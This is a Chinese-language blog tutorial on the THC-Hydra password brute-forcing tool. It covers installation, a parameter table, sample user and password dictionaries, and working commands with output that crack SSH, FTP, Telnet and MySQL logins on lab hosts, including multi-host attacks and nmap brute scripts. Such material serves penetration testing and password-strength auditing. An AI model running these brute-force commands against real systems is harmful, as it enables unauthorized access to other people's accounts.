Hydra是一款暴力破解工具，进行并行登录破解，破解远程服务的用户名密码，由黑客组织THC开发，它可以对超过50个协议进行快速字典攻击，包括telnet、ftp、http(s)、smb、MySQL、SMTP等。

Hydra安装

官方github地址：https://github.com/vanhauser-thc/thc-hydra
Kali Linux中自带Hydra，下面介绍其它系统安装方法。

Ubuntu安装

$ apt-get install hydra

centos系统安装

1、下载
地址：https://github.com/vanhauser-thc/thc-hydra/releases/tag/v9.2

2、安装依赖

$ yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel

3、编译安装

$ tar zxf thc-hydra-9.2.tar.gz
$ cd thc-hydra-9.2
$ ./configure
$ make
$ make install

查看帮助信息：

hydra -h
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]Options:-R        restore a previous aborted/crashed session
..............

windows安装

GitHub地址：https://github.com/maaaaz/thc-hydra-windows
下载发布版本，解压就可以使用了

Hydra参数说明

选项	说明
-R	继续上一次破解
-I	忽略现有还原文件（不等待10秒）
-s PORT	指定默认端口
-l LOGIN	指定破解登录用户名
-L FILE	使用文件指定多个用户名
-p PASS	指定密码
-P FILE	指定密码字典
-x MIN:MAX:CHARSET	密码暴力生成
-y	禁止在暴力破解中使用符号
-r	对选项-x使用非随机方法
-e nsr	n：空密码试探，s：使用指定用户和密码试探。
-u	循环用户
-C FILE	冒号分隔用户名密码：“login:pass” 格式
-M FILE	要攻击的服务器列表，每行一个条目，’:'指定端口
-o FILE	将找到的登录/密码写入文件
-b FORMAT	指定-o输出格式，默认text,可选json, jsonv1
-f / -F	找到用户名/密码后中止破解，-f:每个主机，-F：所有
-t TASKS	每个主机并行线程数，默认16
-T TASKS	所有并行线程数，默认64
-w / -W TIME	最大等待响应时间
-c TIME	所有进程每次尝试登录等待时间
-4 / -6	IPv4(默认)/IPv6地址
-v / -V / -d	详细日志模式/每次尝试仅显示用户名密码/调试模式
-k	不重做失败的尝试（适用于-M批量扫描）
-q	不要打印错误连接消息
-U	服务模块详细使用信息
server	目标服务名称或IP地址(也可以使用-M参数)
service	要破解的服务
OPT	可选项

支持的服务包括：adam6500, asterisk, cisco, cisco-enable, cvs, ftp, http-{head|get|post}, http-{get|post}-form, http-proxy, http-proxy-urlenum, icq, imap, irc, ldap2, ldap3[s], mssql, mysql(v4), nntp, pcanywhere, pcnfs, pop3, redis, rexec, rlogin, rpcap, rsh, rtsp, s7-300, smb, smtp, smtp-enum, snmp, socks5, teamspeak, telnet, vmauthd, vnc, xmpp

Hydra使用实例

手动创建用户名字典和密码字典

$ cat user.txt
admin
root
test
zhy
haha
$ cat pwd.txt
admin
test
123456
666666
zhy
12345678
$

破解ssh

使用单个用户名密码

$ hydra 192.168.20.9 ssh -l root -p 12345678
ydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-21 23:41:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.20.9:22/
[22][ssh] host: 192.168.20.9   login: root   password: 12345678
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-21 23:41:46

上面的结果提示推荐使用-t 4，默认并发数为16

使用密码字典

$ hydra 192.168.20.9 ssh -L user.txt -P pwd.txt -t 4 -e ns
hydra ssh://192.168.20.9 -L user.txt -P pwd.txt -t 4 -e ns -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-21 23:50:05
[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task
[DATA] attacking ssh://192.168.20.9:22/
[22][ssh] host: 192.168.20.9   login: root   password: 12345678
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-21 23:50:23

-e ns参数：尝试空密码

破解ftp/telnet

与ssh类似

$ hydra 192.168.20.9 ftp -L user.txt -P pwd.txt -t 4
$ hydra 192.168.20.9 telnet -L user.txt -P pwd.txt -t 4

破解MySQL数据库

$ hydra -L user.txt -P pwd.txt -t 4 127.0.0.1 mysql
$ hydra -L user.txt -P pwd.txt -t 4 mysql://127.0.0.1:3306
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-22 15:55:50
[DATA] max 4 tasks per 1 server, overall 4 tasks, 30 login tries (l:5/p:6), ~8 tries per task
[DATA] attacking mysql://127.0.0.1:3306/
[3306][mysql] host: 127.0.0.1   login: admin   password: admin
[3306][mysql] host: 127.0.0.1   login: root   password: 123456
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-22 15:55:51

ssh、ftp、telnet和mysql协议也可以使用nmap工具破解：
nmap暴力破解脚本：https://nmap.org/nsedoc/categories/brute.html

$ nmap --script ftp-brute -p 21 <host>
$ nmap --script ssh-brute -p 22 <host>
$ nmap --script mysql-brute -p 3306 <host>

批量破解多个主机：-M参数

创建主机字典：

$ cat host.txt
192.168.20.8
192.168.20.9

$ hydra -L user.txt -P pwd.txt -t 4 -M host.txt -f ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-21 23:59:03
[DATA] max 4 tasks per 2 servers, overall 8 tasks, 30 login tries (l:5/p:6), ~8 tries per task
[DATA] attacking ssh://(2 targets):22/
[22][ssh] host: 192.168.20.9   login: root   password: 12345678
[22][ssh] host: 192.168.20.8   login: root   password: 12345678
2 of 2 targets successfully completed, 2 valid passwords found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-21 23:59:17

将破解日志保存到文件中：

$ hydra -L user.txt -P pwd.txt -t 4 -vV -M host.txt -o results.log ssh

--THE END--

欢迎关注公众号:「测试开发小记」及时接收最新技术文章！

hydra暴力破解工具相关推荐

1. Hydra暴力破解工具的用法

   目录 Hydra 常见参数 破解SSH 破解FTP 破解HTTP 破解3389远程登录 Kali自带密码字典 dirb dirbuster fern-wifi metasploit wfuzz Hyd ...

2. Linux下暴力破解工具Hydra详解

   Linux下暴力破解工具Hydra详解 一.简介 Number one of the biggest security holes are passwords, as every password s ...

3. hydra(海德拉)暴力破解工具

   暴力破解是指针对目标,反复猜测其密码或用户名的攻击行为.理论上所有的密码 都可以使用暴力破解,但是越复杂的密码需要的时间越长 1.crunch密码字典 基本用法:      crunch  最小长度 ...

4. 暴力破解工具Hydra

   博文视点 2016-12-20 15:20:23 浏览258 评论0 安全 Blog Hydra 摘要: Hydra是世界顶级的密码暴力破解工具,支持几乎所有协议的在线密码破解,功能强大,密码能否被破 ...

5. 18.暴力破解工具Hydra

   Hydra  世界顶级密码暴力破解工具     支持所有协议在线密码破解,功能强大,密码能否被破解关键取决于枚举的字典是否强大. 在网络安全渗透过程中,配合社工库进行社会工程学攻击,收集个人强相关信息 ...

6. 暴力破解工具-hydra使用

   一.hydra简介: ydra(九头蛇),分布式任务处理系统,由社交标签服务提供商AddThis六年前开发,现在已得到Apache的开源许可,就像Hadoop一样,只是还没有Hadoop那样的知名度和 ...

7. 暴力破解工具Hydra 常用命令总结

   暴力破解工具Hydra 常用命令总结 命令: -R 修复之前使用的aborted/crashed session -S 执行SSL(Secure Socket Layer)连接 -s Port 使用非 ...

8. [网络安全学习篇10]：扫描技术、暴力破解工具（千峰网络安全视频笔记 10 day）

   引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...

9. hydra暴力破解ssh密码

   环境:centos7.0 hydra,是一个非常好用的暴力破解工具,而且名字也很cool. 下面是官网上的介绍: AFP, Cisco AAA, Cisco auth, Cisco enable, C ...

最新文章

1. 转载 load-on-startup的用法
2. 破解phpstorm2017.3.1版本并解决win10下修改hosts问题
3. python 处理 excel格式文件
4. ifelse语句是否必须以else结尾？
5. （85）FPGA约束有哪些-面试必问（九）（第17天）
6. Linux bash 命令
7. js表单提交,面向对象
8. 用C语言实现回调函数
9. flex bison 下载
10. STM32下载程序的三种方法(串口、ST-LINK、 ST-LINK Utility)
11. Deepin安装和设置Kodi，实现手机APP投屏和IPTV功能
12. 5.8Gwifi信道
13. 老司机带你检测相似图片
14. python统计闰年的个数_python 闰年数
15. linux软键盘怎么调出来,软键盘怎么关？软键盘关闭方法
16. 脚下，梦开始的地方——七月总结
17. 对账 概念 - 账证核对，账账核对，账实核对，账表核对
18. MySQL-数据库查询语言
19. 2007山东公务员面试真题汇总
20. 基于位操作的类CBitBuffer

热门文章

1. azure虚拟服务器,Azure 虚拟机价格详情_预算 - Azure 云计算
2. BIOS知识枝桠——ASL语言
3. 坐实了！这是华人主场！包揽全部奖项！
4. “空中手机开机”解禁 为何飞机上还不能打电话？
5. [电子书地址]小学、初中、高中电子课本大全（为孩子收藏吧）
6. 超级楼梯——有一楼梯共n级，刚开始时你在第一级，若每次只能跨上一级或二级，要走上第n级，共有多少种走法？
7. 德语c2大语言证书的作用,说说德语语言水平级别A1,A2,B1,B2,C1,C2是啥级别
8. 下载pyboard的flash中的驱动程序_打印机驱动程序被标记为恶意软件 戴尔已紧急撤下链接...
9. 找到一个可以下载开放式基金历史数据的网站
10. 命令行工具集合busybox编译